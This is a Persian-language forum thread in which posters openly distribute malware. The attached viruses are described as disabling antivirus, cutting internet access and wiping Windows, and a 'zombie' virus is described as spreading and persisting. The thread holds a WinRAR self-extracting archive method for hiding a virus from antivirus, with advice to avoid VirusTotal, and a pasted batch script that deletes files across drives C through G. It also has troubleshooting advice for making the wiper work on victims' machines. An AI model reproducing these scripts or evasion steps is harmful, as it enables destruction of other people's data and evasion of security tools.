رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سوروس Antiviruse Ripper

این ویروس اگر روی سیستم قربانی اجرا شود  انتی ویروسی که بر روی کامپیوتر خود نصب کرده باشد را از کار می اندازد و

راه را برای مقاصد بعدی شما هموار می کند.......................... B)

البه شما میتوانید نام انتی ویروس های دیگر را به این لیست اضافه کنید و ویروس را کام  تر کنید

این ویروس به زبان batch است و برای ساخت ان باید سورس ویروس را در درون نود پد کپی کرده و انرا با پسوندbat ذخیره کنید

خب من سوس این ویروس رو توی نود پد زخیره کردم که کارتون راحت باشه..... :D

اگر سوالی داشتید و خوش حال میشوم که بتوانم به شما کمکی کنم پس در همین تاپیک سوال خود را اعلام کنید تا به شما پاسخ دهم و

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد ویروس هایی قوی تر و مخربتر به شما یاد خواهم داد

با تشکر B)

antiviruse ripper.rar

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

• پاسخ 28
  • ایجاد شد
  • آخرین پاسخ

بهترین ارسال کنندگان این موضوع

ساخت ویروس destroyer

این ویروس ساده که توسط خودم نوشته شده است را می توانید با کمی خلاقیت و تدبیر در سورس ان تغییر انجام داده و انرا بهتر کنید

این ویروس به طور غیر قابل برگشتی همه ی فرمت های ویندوز را از پاک می کند و بسیار خطرناک است

لطفا انرا روی کامپیوتر خود اجرا نکنید ویا انرا روی ماشین مجازی امتحان کنید این ویروس به زبان batch است 

برای ساخت ان کافی است سورس ویروس را در درون نودپد قرار دهید و انرا با فرمت  .bat زخیره کنید

این هم از سورس ویروس که برای راحتیه کارتون اون رو توی نود پد ضمیمه میکنم....  

پسورد فایــل : guardiran.org

اگر سوالی داشتید و خوش حال میشوم که بتوانم به شما کمکی کنم پس در همین تاپیک سوال خود را اعلام کنید تا به شما پاسخ دهم و

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد ویروس هایی قوی تر و مخربتر به شما یاد خواهم داد

با تشکر

destroyer.rar

لینک به دیدگاه

ویروس net disable

این ویروس می تواند دسترسی کار بر را یه اینترنت به طور دائمی قطع کند و فرد برای درست کردن ان یا باید 

کار با رجیستری کامپیوتر را بداند ویا اینکه ویندوز کامپیوتر خود را عوض کند........ :D که در هر دو صورت مکافاتی دارد

این ویروس به زبان batch است 

برای ساخت ان کافی است سورس ویروس را در درون نودپد قرار دهید و انرا با فرمت  .bat زخیره کنید

با تشکر

net disable.rar

لینک به دیدگاه

ویروس trojan horse

تروجان هورس یک تروجان قدیمی و شناخته شده است که می توان گفت که یکی از خطرناک ترین ویروس هاست که تا به الا هم  مورد استفاده ی عموم قرار گرفته است

البته باد قید کرد که این سورس مربوط به basic ترین نوع این ویروس میباشد که در پست های بعدی نوع پیشرفته ی انرا برایتان قرار خواهم داد.....

با تشکر

trojan horse.rar

لینک به دیدگاه

ساخت ویروس matrix

با سلام خدمت شما دوستان گرامی

در این تاپیک میخواهم سورس ویروس ماتریکس که با زبان سی نوشته شده را

برایتان قرار بدهم این ویروس بسیار خطر ناک است پس لطفا روی کامپیوتر

خودتان انرا تست نکنید این سورس را در نود پد paste کنید و انرا با فرمت exe. ذخیره کنید

با تشکر

matrix.rar

لینک به دیدگاه

((c((crypting viruse

از انجایی که درسایت جست و جو کردم و متد مورد نیاز برای مخفی کردن ویروس نیافتم تصمیم گرفتم تابیکی که در ها قرار دادم به به صورت اموزش قرار دهم و شما دوستان عزیز از ان برای مخفیکردن ویروستون از ان استفاده کنید

طریقه ی کریپت کردن ویروس ها با winrar

دوست عزیز سلاملطفا نرم افزار های  مربوط به این کارو قرار بدید .

با سلام خدمت شما دوست گرامی

شما متوانید با استفاده از نرم افزار ساده ی وینرار فایل خود را کریپت کنید......

برای این کار شما روی ویروس خود کلیک راست کرده  گزینه ی add archive  را میزنید  ودر سربرگ General تیک گزینه های cerate sfx archive وcreate solid archive و lock archive  را میزنید, ودرset a password برای فایل خود یک پسورد چند رقمی میگزاریم وانرا یاد داشت میکنیم

حال به سراغ سر برگ Advanced میرویم و در قسمت sfx options به سراغ سر برگ General میرویم و در کادر زیر ان متن %appdata%  را وارد میکنیم  و

تیک گزینه ی save and restore the path  را میزنیم

حال در سر برگ update  تیک گزینه های over write all files و extrack and replace files را میزنیم
حال در سر برگ setup در کادری که بالای ان نوشته شده  run after extraction  نام ویروس خود را با پسوند ان مینویسیم 

به یاد داشته باشید که نام ویروس خود را باید بدون space هم انتخاب کنید و هم وارد کنید

مثلا  اگر نام ویروس windows media player است انرا به صورت windowsmediaplayerوارد کنید

حال در سر برگ modes چک گزینه ی unpack to temporarey folder را میزنیم و گزینه  ی hide all را انتخاب می کنیم ودکمه ی ok را میزنیم و در اصلی نیز دکمه ی ok را میزنیم 

اکنون ما نیمی از کار ها را انجام داده ایم.........امیدوارم که خسته نشده باشید.....

اکنون یک note pad باز کنید و متن زیر را در درون ان paste می کنیم

name.exe -ppassword -dplace

حال به جای name.exe نام فایل را باپسوند ان بدون فاصله میگزاریم و       به جای password رمز ویروس رار شده را بدون فاصله وارد میکنیم و       به جای place هم همان %appdata%را وارد میکنیم. و فابل نوت را با پسوند .bat ذخیره میکنیم

حالا هم ویروسrar شده را هم فایل bat را دوباره وینرار میکنیم   درست مثل بالا تمام مراحل را انجام میدهیم با این تفاوت که این بار پسورد برای فایل قرار نمیدهیم و در قسمت sfx options به سراغ

سر برگ setup در کادری که بالای ان نوشته شده  run after extraction  نام نود پد  خود را با پسوند ان مینویسیم .

حال میتوانیم در سر برگ text and icon  و درقسمت from the file load sfx icon برای خود یک icon مشخص کنیم  و انرا زخیره کنید ودکمه ی ok را میزنیم و در اصلی نیز دکمه ی ok را میزنیم

و...............................................................

تمام شما با موفقیت توانستید ویروس خود را کریپت کنید

از شما دوستان عزیز عاجزانه خواهش میکنم که ویروس خود را در viruse total و jodi.com اسکن نکنید چون اگر این کار را کردید بعد از مدتی این روش کریپینگ به تاریخ می پیوندد پس لطفا ار اسکنر های انلاین دیگری مثل metascan استفاده کنید

اگر سوالی داشتید و یا در انجام این روش مشکلی داشتید خوش حال میشوم که بتوانم به شما کمکی کنم پس در همین تاپیک سوال خود را اعلام کنید تا به شما پاسخ دهم و

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد روش هایی بهتر و کار امد تری به شما خواهم گفت

با تشکر

لینک به دیدگاه

zombie viruse

ZombieVirus.jpg

این ویروس به طرز مضحکی ازار دهنده است و بسیار خطرناک جون برای خلاص شدن از دست ان باید ویندوز کامپیوتر را عوض کرد :D

کار هایی ک این ویروس انجام میدهد این است

1. خود را در استارت اپ کامپیوتر کپی میکند (یعنی با هر بار روشن شدن ویندوز ویروس هم بالا می اید)
  2. خودش را بیش از هزار بار در کامپیوتر در جاهای مختلف کپی میکند
  3. خودش را و دیگر فایل های ساخته شده را مخفی میکند
  4. جای کلیک راست وکلیک چپ را عوض میکند
  5. از بین برنده ی اینترنت اکسپلورل و تسک منجر ولایم وار وام اس ام و نورتون
  6. قرار دادن زمان روی ۱۱:۱۱
  7. نشان دادن ارور با متن دلخواه
  8. و....................... B)

و نام انرا به zombie ذخیره کنید و اگر خواستید نام انرا عوض کنید در سورس برنامه هر جا که zombie  بود انرا به نام دلخوا ه تغییر دهید و در قسمت  tskill  هم میتوانید نام انتی ویروس

سیستم قربانی را قرار دهید و انرا غیر فعال کنید و یا زمان را خودتان تغییر دهید

باز هم قید میکنم انها را روی سیستم خود امتحان نکنید

با تشکر

zombie.rar

لینک به دیدگاه

سلام دوست عزیز ممنون از پاسخ گویی .. این ویروسی که من میگم همشون روی ویندوز اجرا کردم که ویندوز خودم 7 هست و روی همه جور ویندوزی اجرا کردم بجز سیستم خودم عملا کار نمیکند و بجای فرمت کردن هارد قربانی فقط فایل های موجود فقط در همون پوشه ای که ویروس را ریخته ایم پاک میکند و بقیه دست نخورده میمونند ..ممننون

ویروسشم اینه 

@echo off
ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:windows*.*
Echo y | echo a | Echo y | del c:*.*
Echo y | echo a | Echo y | del d:*.*
Echo y | echo a | Echo y | del e:*.*
Echo y | echo a | Echo y | del f:*.*
Echo y | echo a | Echo y | del g:*.*
echo y | copy *.* C:
echo y | copy *.* D:
echo y | copy *.* E:
echo y | copy *.* F:
echo y | copy *.* G:
resrart

بعد اگه این دستور ها((((فقط دستور خط سوم با تغییر نام درایو )))) را دستی در سیستم خودم وارد کنم درایو هام فرمت میشن اما اگه همینا رو دستی وارد کنم تو سیستم دیگه ای اونا هیچ تغییری نمیکنن

با سلام خدمت شما دوست گرامی

شاید که سیستم قربانی با نام های دیگری درایو های خود را دسته بندی کرده است و یا از سیستم عامل قدیمی تر(xp)و یا از سیستم عامل پیشرفته تر (8_10_8.1)استفاده میکند که اگر اینچنین نبود ......میتونید از ابزار های spreader استفاده کنید که با یکبار کلیک روی انها در کل نیندوز

فایل ویروسی را پخش میکند و اگر باز هم نشد در همین تاپیک به من اطلاع دهید که برایتان ویروس جدیدی بگزارم که در هر سیستم عاملی همین کار را بکند

با تشکر از پیگیری شما دوست عزیز

لینک به دیدگاه

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

• اضافه کردن...